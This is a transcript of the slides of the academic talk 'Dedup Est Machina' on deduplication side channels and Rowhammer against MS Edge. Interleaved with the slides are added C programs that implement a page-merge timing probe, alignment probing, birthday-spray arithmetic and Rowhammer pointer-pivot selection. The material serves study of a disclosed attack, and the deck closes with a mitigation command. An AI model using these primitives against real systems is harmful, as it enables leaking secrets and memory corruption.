TRANSCRIPT
Dedup Est Machina
Memory Deduplication as an Advanced Exploitation Vector
Erik Bosman, Kaveh Razavi, Herbert Bos and Cristiano Giuffrida
Deduplication (software side-channel)
+ Rowhammer (hardware bug)
Exploit MS Edge without software bugs (from JavaScript)
1
Deduplication
- leak heap & code pointer addresses
JavaScript Array: +3.141592, +0.0, 42., 1, NaN
chakra.dll
2
Deduplication
- leak heap & code pointer addresses
- create a fake object
Rowhammer
- create reference to our fake object
3
deduplication side-channel attack
(figure: physical memory, attacker process, victim process)
4
deduplication side-channel attack
normal write: write
copy on write (due to deduplication): copy page contents, then write
5
Can we generalize this to leaking arbitrary data, like an ASLR pointer or a password?
6
Challenge 1:
The secret we want to leak does not span an entire page.
7
turning a secret into a page
known data + secret: secret page
8
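The two slides above describe the oracle (a write to a merged page pays a copy-on-write fault) and the page construction (known data around a guessed secret). The program below is an added example, not code from the talk or the paper: it targets Linux KSM via madvise(MADV_MERGEABLE) instead of Windows page combining, which is an assumption, and the known data, secret offset, guess values, wait time and latency thresholds are all constructed for the example and must be calibrated on a real target.

```c
/*
 * Added example (not from the talk or the paper): a minimal deduplication
 * side-channel probe for Linux with KSM. It builds guess pages (known data
 * with a guessed secret at a known offset), marks them mergeable, waits for
 * a deduplication pass, then times one write per page. A write to a merged
 * page takes a copy-on-write fault plus a 4 KiB copy, so it is measurably
 * slower than a write to a private page.
 *
 * Assumptions: CONFIG_KSM and /sys/kernel/mm/ksm/run = 1; the page contents,
 * the secret offset, the wait time and the timing thresholds below.
 */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/mman.h>

#define PAGE_BYTES 4096

/* "Turning a secret into a page": known data with the guess at secret_off.
 * Returns 0, or -1 if the guess would run past the end of the page. */
int build_secret_page(uint8_t *page, const uint8_t *known, size_t secret_off,
                      const uint8_t *guess, size_t guess_len)
{
    if (secret_off > PAGE_BYTES || guess_len > PAGE_BYTES - secret_off)
        return -1;
    memcpy(page, known, PAGE_BYTES);
    memcpy(page + secret_off, guess, guess_len);
    return 0;
}

static uint64_t now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Time one byte write: an ordinary store on a private page, a copy-on-write
 * fault on a page the kernel has merged. */
uint64_t time_write_ns(volatile uint8_t *page)
{
    uint64_t t0 = now_ns();
    page[0] ^= 0x01;
    return now_ns() - t0;
}

/* Classify a timed write against a baseline taken on a private page.
 * "4x the baseline and over 1 us" is an assumed threshold. */
int looks_shared(uint64_t write_ns, uint64_t baseline_ns)
{
    return write_ns > 4 * baseline_ns && write_ns > 1000;
}

static uint8_t *map_pages(size_t n)
{
    void *p = mmap(NULL, n * PAGE_BYTES, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) { perror("mmap"); exit(1); }
    return p;
}

int main(void)
{
    enum { NGUESS = 4 };
    uint8_t known[PAGE_BYTES];
    memset(known, 0x41, PAGE_BYTES);               /* constructed known data */
    const size_t secret_off = 16;                  /* assumed secret position */
    const uint8_t secret[2] = { 0xde, 0xad };      /* what the "victim" holds */

    uint8_t *victim = map_pages(1), *guesses = map_pages(NGUESS), *priv = map_pages(1);
    build_secret_page(victim, known, secret_off, secret, sizeof secret);
    for (int i = 0; i < NGUESS; i++) {
        uint8_t guess[2] = { 0xde, (uint8_t)(0xaa + i) };   /* i == 3 is right */
        build_secret_page(guesses + i * PAGE_BYTES, known, secret_off, guess, 2);
    }
    memset(priv, 0x42, PAGE_BYTES);                 /* unique content, never merged */

    if (madvise(victim, PAGE_BYTES, MADV_MERGEABLE) != 0 ||
        madvise(guesses, NGUESS * PAGE_BYTES, MADV_MERGEABLE) != 0) {
        perror("madvise(MADV_MERGEABLE): KSM unavailable");
        return 1;
    }
    const char *wait = getenv("DEDUP_WAIT_SEC");   /* a KSM pass takes a while */
    sleep(wait ? (unsigned)atoi(wait) : 30);

    uint64_t baseline = time_write_ns(priv);
    printf("private page write: %llu ns\n", (unsigned long long)baseline);
    for (int i = 0; i < NGUESS; i++) {
        uint64_t t = time_write_ns(guesses + i * PAGE_BYTES);
        printf("guess %d (0xde%02x): %llu ns%s\n", i, 0xaa + i, (unsigned long long)t,
               looks_shared(t, baseline) ? "  <- merged with the victim page" : "");
    }
    return 0;
}
```

Enable KSM first (echo 1 > /sys/kernel/mm/ksm/run) and raise DEDUP_WAIT_SEC if the scanner is slow; only guess 3 is byte-identical to the victim page, so only its write should pay the copy-on-write cost. Both KSM and Windows page combining run their passes in the background over seconds to minutes, so a real attack plants every candidate page before the pass and reads them all after it, and repeats the measurement to average out scheduling noise.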
Challenge 2:
The secret we want to leak has too much entropy to leak all at once.
9
primitive #1: alignment probing
known data + secret: secret page
10
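Alignment probing as an added, runnable model; this is not code from the talk or the paper. The assumption is that the attacker controls how much data sits in front of the secret, and therefore how many secret bytes fall before a page boundary. The deduplication oracle is replaced by a byte comparison that stands in for the write-latency signal, so the block demonstrates the search strategy (at most 256 guess pages per byte instead of 256^n for the whole secret), not the timing itself. The secret, the padding byte and the victim layout are constructed for the example.

```c
/*
 * Added example (not from the talk or the paper): alignment probing over a
 * modeled deduplication oracle. The victim stores an n-byte secret right
 * after attacker-influenced data, so the attacker chooses how many secret
 * bytes land at the end of a page. With exactly one unknown byte in the page
 * at most 256 guess pages find it; then the boundary is slid by one byte and
 * the step repeats: at most 256*n guesses instead of 256^n.
 *
 * The oracle is a byte comparison standing in for the real signal (the
 * copy-on-write latency of a write to a merged guess page).
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_BYTES 4096
#define KNOWN_FILL 0x20   /* assumption: the victim pads its buffer with spaces */

struct victim {
    uint8_t secret[16];
    size_t secret_len;
    unsigned long oracle_queries;   /* guess pages submitted so far */
};

/* Victim side of the model: the page ends with the first `in_page` secret
 * bytes; the rest of the secret spills into the next page. The attacker
 * reaches this state by controlling how much data precedes the secret. */
static void victim_render(const struct victim *v, size_t in_page, uint8_t *page)
{
    memset(page, KNOWN_FILL, PAGE_BYTES);
    memcpy(page + PAGE_BYTES - in_page, v->secret, in_page);
}

/* Modeled deduplication oracle: "merged" iff the guess page is identical to
 * the victim page. In the real attack this is a slow write to the guess page. */
static int oracle_merged(struct victim *v, size_t in_page, const uint8_t *guess)
{
    uint8_t page[PAGE_BYTES];
    v->oracle_queries++;
    victim_render(v, in_page, page);
    return memcmp(page, guess, PAGE_BYTES) == 0;
}

/* Attacker: recover n secret bytes one at a time. Returns how many bytes
 * were recovered (n on success). */
size_t alignment_probe(struct victim *v, uint8_t *out, size_t n)
{
    uint8_t guess[PAGE_BYTES];
    for (size_t k = 1; k <= n; k++) {          /* k secret bytes inside the page */
        int found = 0;
        for (int g = 0; g < 256 && !found; g++) {
            memset(guess, KNOWN_FILL, PAGE_BYTES);
            memcpy(guess + PAGE_BYTES - k, out, k - 1);   /* bytes already leaked */
            guess[PAGE_BYTES - 1] = (uint8_t)g;            /* the one unknown byte */
            if (oracle_merged(v, k, guess)) {
                out[k - 1] = (uint8_t)g;
                found = 1;
            }
        }
        if (!found)
            return k - 1;
    }
    return n;
}

/* Leak a constructed 4-byte secret and report the oracle queries used. */
unsigned long leak_demo(uint8_t *out, size_t n)
{
    struct victim v = { { 0xde, 0xad, 0xbe, 0xef }, 4, 0 };   /* constructed */
    if (n > v.secret_len)
        n = v.secret_len;
    alignment_probe(&v, out, n);
    return v.oracle_queries;
}

int main(void)
{
    uint8_t leaked[4];
    unsigned long q = leak_demo(leaked, 4);
    printf("leaked %02x%02x%02x%02x with %lu oracle queries (blind brute force: 2^32)\n",
           leaked[0], leaked[1], leaked[2], leaked[3], q);
    return 0;
}
```

Each oracle query in the real attack costs a full deduplication pass, so an attacker does not query sequentially as the loop does here: all 256 candidate pages for one byte (1 MiB) are planted at once, and after the pass the one that became slow to write reveals the byte.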
primitive #2: partial reuse
known data + secret: secret page
11
JIT function epilogue (MS Edge)
mov RCX, 0x1c20
mov RAX, [code address]
jmp RAX
trap trap trap ... (rest of the page padded with trap instructions)
12
But what if we can't leak part of the secret?
13
birthday problem
14
primitive #3: birthday heapspray
(figure: physical memory, attacker memory, victim memory)
15
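The arithmetic behind the last two slides, as an added example that is not from the talk or the paper. It generalizes the slides' picture to arbitrary sizes: N victim pages each carrying an independent k-bit secret (for instance N sprayed arrays, each storing its own address) against M attacker guess pages. The uniform and independent secret model and the sample sizes in main are assumptions; the numbers are illustrative and say nothing about Edge's real address entropy.

```c
/*
 * Added example (not from the talk or the paper): the birthday heap spray.
 * Guessing one k-bit secret costs up to 2^k guess pages. If the victim holds
 * N pages with independent secrets and the attacker plants M distinct guess
 * pages, every one of the N*M pairs can collide, and a single collision
 * already yields one valid secret.
 *
 * Model (assumption): each victim secret is uniform over S = 2^k values and
 * independent of the others; the M guesses are distinct. k must be 1..63.
 */
#include <stdint.h>
#include <stdio.h>

/* P(at least one guess page merges with some victim page) = 1 - (1 - M/S)^N.
 * The power is evaluated by repeated multiplication so no libm is needed. */
double birthday_hit_probability(unsigned k_bits, uint64_t n_victim, uint64_t m_guess)
{
    double s = (double)((uint64_t)1 << k_bits);
    if ((double)m_guess >= s)
        return 1.0;
    double p_miss_one = 1.0 - (double)m_guess / s;  /* one victim page misses all guesses */
    double p_miss_all = 1.0;
    for (uint64_t i = 0; i < n_victim; i++)
        p_miss_all *= p_miss_one;
    return 1.0 - p_miss_all;
}

/* Expected number of (victim page, guess page) matches: N*M/S. */
double expected_hits(unsigned k_bits, uint64_t n_victim, uint64_t m_guess)
{
    double s = (double)((uint64_t)1 << k_bits);
    return (double)n_victim * (double)m_guess / s;
}

/* splitmix64: a small deterministic generator for the Monte Carlo check. */
static uint64_t next_u64(uint64_t *state)
{
    uint64_t z = (*state += 0x9e3779b97f4a7c15ull);
    z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ull;
    z = (z ^ (z >> 27)) * 0x94d049bb133111ebull;
    return z ^ (z >> 31);
}

/* Monte Carlo check of the closed form: fraction of trials in which at least
 * one of N random k-bit victim secrets falls inside the attacker's M guesses.
 * The guesses are taken as the values 0..M-1; under the uniform model any
 * fixed set of M distinct values behaves the same. */
double simulate_hit_rate(unsigned k_bits, uint64_t n_victim, uint64_t m_guess,
                         unsigned trials, uint64_t seed)
{
    uint64_t state = seed;
    unsigned hits = 0;
    for (unsigned t = 0; t < trials; t++) {
        for (uint64_t i = 0; i < n_victim; i++) {
            uint64_t secret = next_u64(&state) >> (64 - k_bits);
            if (secret < m_guess) { hits++; break; }
        }
    }
    return (double)hits / trials;
}

int main(void)
{
    /* Illustrative sizes only. */
    struct { unsigned k; uint64_t n, m; } cases[] = {
        { 16, 1, 256 },            /* one victim page: plain brute force, P = M/S */
        { 16, 256, 256 },          /* birthday: 256 victim pages vs 256 guesses */
        { 32, 1 << 16, 1 << 16 },  /* 256 MiB sprayed on each side vs a 32-bit secret */
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("k=%u N=%llu M=%llu: P(hit)=%.4f expected hits=%.3f simulated=%.4f\n",
               cases[i].k, (unsigned long long)cases[i].n, (unsigned long long)cases[i].m,
               birthday_hit_probability(cases[i].k, cases[i].n, cases[i].m),
               expected_hits(cases[i].k, cases[i].n, cases[i].m),
               simulate_hit_rate(cases[i].k, cases[i].n, cases[i].m, 200, 1));
    return 0;
}
```

The third case is the point of the primitive: a 32-bit secret that would take 2^32 guess pages (16 TiB) against a single victim page falls with probability about 0.63 once 2^16 victim pages and 2^16 guess pages (256 MiB each) are in play, because the expected number of matching pairs N*M/S reaches 1.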
pointer pivoting
JavaScript Array: array header, array data
JavaScript Array: array header, array data
16
rowhammer attack
DDR memory: rows, row activation
17
pointer pivoting
JavaScript Array: array header, array data
JavaScript Array: array header, array data
18
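Pointer pivoting needs a bit flip that the hardware actually offers and that moves the pointer into memory the attacker controls. The block below is an added example, not code from the talk or the paper, showing that selection step: given flip templates found by an earlier hammering run (page offset, bit, direction), a pointer stored at a known offset of the victim page, and the address range of the attacker's array data, it reports which templates turn the pointer into one that lands inside the controlled data. The hammering loop itself is not shown. Little-endian 64-bit pointers, the pointer offset inside the header, the templates and the addresses are all constructed for the example.

```c
/*
 * Added example (not from the talk or the paper): selecting a Rowhammer bit
 * flip for pointer pivoting. After the deduplication phase the attacker knows
 * where its own array data (holding the fake object) lives and where a victim
 * array header with a pointer sits. Rowhammer only flips bits at positions a
 * template run showed to be vulnerable, in one direction each, so the usable
 * flips are those that hit the pointer's bytes, match the pointer's current
 * bit value, and move the pointer into the controlled range.
 *
 * Assumptions: 64-bit little-endian pointers; templates, offsets and
 * addresses below are constructed.
 */
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

struct flip_template {
    uint16_t page_offset;   /* byte within the 4 KiB page */
    uint8_t  bit;           /* 0..7 within that byte */
    uint8_t  one_to_zero;   /* 1: a set bit flips to 0; 0: a cleared bit flips to 1 */
};

struct pivot {
    uint64_t new_ptr;       /* pointer value after the flip */
    size_t   template_idx;
};

/* Returns 1 and sets *new_ptr if template t, applied to the 8-byte pointer
 * `ptr` stored at `ptr_offset` in the page, yields a pointer inside
 * [ctl_lo, ctl_hi), i.e. inside attacker-controlled array data. */
int flip_pivots_pointer(const struct flip_template *t, uint16_t ptr_offset,
                        uint64_t ptr, uint64_t ctl_lo, uint64_t ctl_hi,
                        uint64_t *new_ptr)
{
    if (t->page_offset < ptr_offset || t->page_offset >= ptr_offset + 8)
        return 0;                                      /* flip misses the pointer */
    unsigned bitpos = (t->page_offset - ptr_offset) * 8 + t->bit;   /* little-endian */
    unsigned cur = (ptr >> bitpos) & 1;
    if (cur != t->one_to_zero)
        return 0;                                      /* flip direction does not apply */
    uint64_t flipped = ptr ^ ((uint64_t)1 << bitpos);
    if (flipped < ctl_lo || flipped >= ctl_hi)
        return 0;                                      /* lands outside controlled data */
    *new_ptr = flipped;
    return 1;
}

/* Scan all templates; returns the number of usable pivots written to out[]. */
size_t find_pivots(const struct flip_template *tpl, size_t ntpl, uint16_t ptr_offset,
                   uint64_t ptr, uint64_t ctl_lo, uint64_t ctl_hi,
                   struct pivot *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < ntpl && n < max; i++) {
        uint64_t np;
        if (flip_pivots_pointer(&tpl[i], ptr_offset, ptr, ctl_lo, ctl_hi, &np)) {
            out[n].new_ptr = np;
            out[n].template_idx = i;
            n++;
        }
    }
    return n;
}

/* Constructed template run: the pointer is assumed at header offset 8, so
 * page offset 11 is byte 3 of the pointer (bits 24..31). */
static const struct flip_template demo_templates[] = {
    { 11, 2, 0 },    /* bit 26, 0->1 */
    { 11, 3, 0 },    /* bit 27, 0->1 */
    { 11, 3, 1 },    /* bit 27, but only 1->0 */
    { 11, 4, 1 },    /* bit 28, 1->0: clears the region bits */
    { 100, 5, 0 },   /* not inside the pointer at all */
};
#define DEMO_NTEMPLATES (sizeof demo_templates / sizeof demo_templates[0])

int main(void)
{
    const uint64_t ptr = 0x0000020010000000ull;      /* victim header -> its data */
    const uint64_t lo = 0x0000020014000000ull;       /* attacker array data [lo, hi) */
    const uint64_t hi = 0x000002001c000000ull;
    struct pivot pv[8];
    size_t n = find_pivots(demo_templates, DEMO_NTEMPLATES, 8, ptr, lo, hi, pv, 8);
    for (size_t i = 0; i < n; i++)
        printf("template %zu pivots %#llx -> %#llx\n", pv[i].template_idx,
               (unsigned long long)ptr, (unsigned long long)pv[i].new_ptr);
    return 0;
}
```

Only two of the five templates survive: the other three either flip in the wrong direction, miss the pointer, or send it outside the sprayed data. In the real exploit the attacker places the victim array so that its header lands on a page with a usable template, which is why the templating pass and the pointer leak have to come before the hammering.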
in short:
- Memory deduplication is a more powerful side-channel than previously thought.
- Reliable browser exploitation using rowhammer in JavaScript is possible.
(on Windows 10, MS Edge, without using any bugs)
> Disable-MMAgent -PageCombining
19